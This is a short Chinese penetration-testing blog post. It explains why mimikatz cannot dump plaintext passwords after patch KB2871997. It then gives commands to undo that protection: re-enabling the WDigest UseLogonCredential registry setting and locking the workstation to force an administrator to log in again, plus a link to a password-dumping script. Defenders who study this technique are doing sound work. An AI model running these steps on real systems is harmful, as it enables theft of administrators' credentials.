KB2871997无法抓取明文密码

内网渗透
创建时间:
阅读:
  1. 补丁安装
  2. 抓取明文密码

前几天在项目中发现利用mimiakatz无法抓取明文密码,hash又解不出来,pth过去也不行,后来查了资料后发现是打了补丁(KB2871997)的原因。

补丁安装

KB2871997

安装好之后运行命令:

1
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

重启计算机,再次利用mimikatz抓取密码:

这个时候我们发现只有hash没有明文了,freebuf里说的mimikatz不管用了==

抓取明文密码

1
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1

可以将我们之前的 UseLogonCredential 设置成 1,然后注销计算机,等待管理员重新登录就可以抓取明文密码
锁屏命令:

1
rundll32.exe user32.dll,LockWorkStation

也可以直接使用三好学生的ps脚本:
https://github.com/3gstudent/Dump-Clear-Password-after-KB2871997-installed

效果如下:

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:KB2871997无法抓取明文密码

本文作者:sher10ck

发布时间:2020-11-02, 22:06:53

最后更新:2020-11-02, 23:07:38

原始链接:http://sherlocz.github.io/2020/11/02/KB2871997/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

©2019-2020 sher10ck

Built with Hexo and 3-hexo theme

目录